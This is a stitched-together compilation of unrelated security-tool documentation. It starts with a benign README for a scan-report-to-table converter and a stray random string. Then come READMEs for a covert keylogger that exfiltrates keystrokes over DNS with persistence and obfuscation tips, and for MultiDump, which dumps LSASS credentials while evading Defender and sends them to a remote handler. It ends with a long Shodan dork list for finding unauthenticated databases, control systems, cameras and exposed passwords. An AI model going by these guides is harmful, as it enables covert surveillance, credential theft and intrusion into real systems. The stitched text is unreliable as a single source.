[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]
Converting scanning reports to a tabular format
optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to ouput a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the outpu t XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).
specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.
A few examples
To produce an XLSX format:
$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
Or to output a CSV file:
$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,44 5,57608,SMB Signing not required,2,X
To produce an XLSX format:
$ sr2t --nmap example/nmap.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+--------------- --+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+
Or to output a CSV file:
$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X
To produce an XLSX format:
$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx
To produce an text tabular format to stdout:
$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
Or to output a CSV file:
$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X
To produce an XLSX format:
$ sr2t --dirble example/dirble.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
Or to output a CSV file:
$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X
To produce an XLSX format:
$ sr2t --testssl example/testssl.json -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
Or to output a CSV file:
$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X
To produce an XLSX format:
$ sr2t --fortify example/fortify.fpr -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
Or to output a CSV file:
$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X
WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp
This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.
These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.
The server uses python3.
To install dependencies, run python3 -m pip install -r requirements.txt
To start the server, run python3 main.py
usage: dns exfiltration server [-h] [-p PORT] ip domain
positional arguments:
ip
domain
options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on
By default, the server listens on UDP port 53. Use the -p
flag to specify a different port.
ip
is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.
domain
is the domain to listen for, which should be the domain that the server is authoritative for.
On the registrar, you want to change your domain's namespace to custom DNS.
Point them to two domains, ns1.example.com
and ns2.example.com
.
Add records that make point the namespace domains to your exfiltration server's IP address.
This is the same as setting glue records.
The Linux keylogger is two bash scripts. connection.sh
is used by the logger.sh
script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh
script. It will automatically establish a connection and send the data.
logger.sh
# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed
To start the keylogger, run the command ./logger.sh [domain] && exit
. This will silently start the keylogger, and any inputs typed will be sent. The && exit
at the end will cause the shell to close on exit
. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null
to display error messages.
The -p
option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/
.
The -l
option will show warnings and errors. Can be useful for debugging.
logger.sh
and connection.sh
must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile
to start on every new interactive shell.
connection.sh
Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet
To build keylogging program, run make
in the windows
directory. To build with reduced size and some amount of obfuscation, make the production
target. This will create the build
directory for you and output to a file named logger.exe
in the build
directory.
make production domain=example.com
You can also choose to build the program with debugging by making the debug
target.
make debug domain=example.com
For both targets, you will need to specify the domain the server is listening for.
You can use dig
to send requests to the server:
dig @127.0.0.1 a.1.1.1.example.com A +short
send a connection request to a server on localhost.
dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short
send a test message to localhost.
Replace example.com
with the domain the server is listening for.
A record requests starting with a
indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.
The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].
The server will respond with an IP address in following format: 123.123.123.[id]
Concurrent connections cannot exceed 254, and clients are never considered "disconnected."
A record requests starting with b
indicate exfiltrated data being sent to the server.
The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].
The server will respond with [code].123.123.123
id
is the id that was established on connection. Data is sent as ASCII encoded in hex.
code
is one of the codes described below.
200
: OKIf the client sends a request that is processed normally, the server will respond with code 200
.
201
: Malformed Record RequestsIf the client sends an malformed record request, the server will respond with code 201
.
202
: Non-Existant ConnectionsIf the client sends a data packet with an id greater than the # of connections, the server will respond with code 202
.
203
: Out of Order PacketsIf the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203
. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.
204
Reached Max ConnectionIf the client attempts to create a connection when the max has reached, the server will respond with code 204
.
Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat
, you should select the appropriate option to print ASCII control characters, such as -v
for cat
, or open it in a text-editor.
The keylogger relies on script
, so the keylogger won't run in non-interactive shells.
For some reason, the Windows Dns_Query_A
always sends duplicate requests. The server will process it fine because it discards repeated packets.
MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
Blog post: https://xre0us.io/posts/multidump
MultiDump supports LSASS dump via ProcDump.exe
or comsvc.dll
, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
__ __ _ _ _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|
Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]
-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections to for slower network speeds
-v Enable v erbose mode
MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]
Handler for RemoteProcDump
options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection
As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.
The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed
, it's likely the Pypykatz version is outdated.
By default, MultiDump uses the Comsvc.dll
method and saves the encrypted dump in the current directory.
MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump
is used, ProcDump.exe
will be writtern to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip
option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r
.
An additional option to dump the SAM
, SECURITY
and SYSTEM
hives are available with --reg
, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
Open in Visual Studio, build in Release mode.
It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper
, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe
can be pasted into MultiDump.c
and Common.h
.
Self deletion can be toggled by uncommenting the following line in Common.h
:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h
:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/
Feel free to make suggestions
Find devices in a particular city. city:"Bangalore"
Find devices in a particular country. country:"IN"
Find devices by giving geographical coordinates. geo:"56.913055,118.250862"
country:us
country:ru country:de city:chicago
Find devices matching the hostname. server: "gws" hostname:"google"
hostname:example.com -hostname:subdomain.example.com
hostname:example.com,example.org
Find devices based on an IP address or /x CIDR. net:210.214.0.0/16
org:microsoft
org:"United States Department"
asn:ASxxxx
Find devices based on operating system. os:"windows 7"
Find devices based on open ports. proftpd port:21
Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010
Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com
Expired certificates ssl.cert.expired:true
ssl.cert.subject.cn:example.com
device:firewall
device:router
device:wap
device:webcam
device:media
device:"broadband router"
device:pbx
device:printer
device:switch
device:storage
device:specialized
device:phone
device:"voip"
device:"voip phone"
device:"voip adaptor"
device:"load balancer"
device:"print server"
device:terminal
device:remote
device:telecom
device:power
device:proxy
device:pda
device:bridge
os:"windows 7"
os:"windows server 2012"
os:"linux 3.x"
product:apache
product:nginx
product:android
product:chromecast
cpe:apple
cpe:microsoft
cpe:nginx
cpe:cisco
server: nginx
server: apache
server: microsoft
server: cisco-ios
dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0
http.html:/dana-na
http.title:"Index of /" http.html:".pem"
onion-location
"product:MySQL"
mysql port:"3306"
"product:MongoDB"
mongodb port:27017
"MongoDB Server Information { "metrics":"
"Set-Cookie: mongo-express=" "200 OK"
"MongoDB Server Information" port:27017 -authentication
kibana content-legth:217
port:9200 json
port:"9200" all:elastic
port:"9200" all:"elastic indices"
"product:Memcached"
"product:CouchDB"
port:"5984"+Server: "CouchDB/2.1.0"
"port:5432 PostgreSQL"
"port:8087 Riak"
"product:Redis"
"product:Cassandra"
"Server: Prismview Player"
"in-tank inventory" port:10001
No auth required to access CLI terminal. "privileged command" GET
P372 "ANPR enabled"
mikrotik streetlight
"voter system serial" country:US
May allow for ATM Access availability NCR Port:"161"
"Cisco IOS" "ADVIPSERVICESK9_LI-M"
"[2J[H Encartele Confidential"
http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
"Server: gSOAP/2.8" "Content-Length: 583"
Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!
"Cobham SATCOM" OR ("Sailor" "VSAT")
title:"Slocum Fleet Mission Control"
"Server: CarelDataServer" "200 Document follows"
http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"
"[1m[35mWelcome on console"
Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.
"DICOM Server Response" port:104
"Server: EIG Embedded Web Server" "200 Document follows"
"Siemens, SIMATIC" port:161
"Server: Microsoft-WinCE" "Content-Length: 12581"
"HID VertX" port:4070
"log off" "select the appropriate"
Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
title:"xzeres wind"
"html:"PIPS Technology ALPR Processors""
"port:502"
"port:1911,4911 product:Niagara"
"port:18245,18246 product:"general electric""
"port:5006,5007 product:mitsubishi"
"port:2455 operating system"
"port:102"
"port:47808"
"port:5094 hart-ip"
"port:9600 response code"
"port:2404 asdu address"
"port:20000 source address"
"port:44818"
"port:1962 PLC"
"port:789 product:"Red Lion Controls"
"port:20547 PLC"
"authentication disabled" port:5900,5901
"authentication disabled" "RFB 003.008"
99.99% are secured by a secondary Windows login screen.
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
product:"cobalt strike team server"
product:"Cobalt Strike Beacon"
ssl.cert.serial:146473198
- default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
ssl:foren.zik
http.html_hash:-1957161625
product:"Brute Ratel C4"
ssl:"Covenant" http.component:"Blazor"
ssl:"MetasploitSelfSignedCA"
Routers which got compromised hacked-router-help-sos
product:"Redis key-value store"
Find Citrix Gateway. title:"citrix gateway"
Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.
title:"Weave Scope" http.favicon.hash:567176827
"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
Jenkins Unrestricted Dashboard x-jenkins 200
"Docker Containers:" port:2375
"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab
"dnsmasq-pi-hole" "Recursion: enabled"
"port: 53" Recursion: Enabled
"root@" port:23 -login -password -name -Session
NO password required for telnet access. port:23 console gateway
"polycom command shell"
nport -keyin port:23
A tangential result of Google's sloppy fractured update approach. ๐ More information here.
"Android Debug Bridge" "Device" port:5555
Lantronix password port:30718 -secured
"Citrix Applications:" port:1604
Vulnerable (kind of "by design," but especially when exposed).
"smart install client active"
PBX "gateway console" -password port:23
http.title:"- Polycom" "Server: lighttpd"
"Polycom Command Shell" -failed port:23
"Polycom Command Shell" -failed port:23
Example: Polycom Video Conferencing
"Server: Bomgar" "200 OK"
"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
"Active Management Technology"
HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900
"Press Enter for Setup Mode port:9999"
Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"
The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"
"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"
"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392
"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"
"X-MS-Server-Fqdn"
Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.
"Authentication: disabled" port:445
"Authentication: disabled" NETLOGON SYSVOL -unix port:445
"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445
"220" "230 Login successful." port:21
"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"
Redirecting sencha port:9000
"Server: Logitech Media Server" "200 OK"
Example: Logitech Media Servers
"X-Plex-Protocol" "200 OK" port:32400
"CherryPy/5.1.0" "/home"
"IPC$ all storage devices"
title:camera
webcam has_screenshot:true
"d-Link Internet Camera, 200 OK"
"Hipcam RealServer/V1.0"
"Server: yawcam" "Mime-Type: text/html"
("webcam 7" OR "webcamXP") http.component:"mootools" -401
"Server: IP Webcam Server" "200 OK"
html:"DVR_H264 ActiveX"
With username:admin and password: :P NETSurveillance uc-httpd
Server: uc-httpd 1.0.0
"Serial Number:" "Built:" "Server: HP HTTP"
ssl:"Xerox Generic Root"
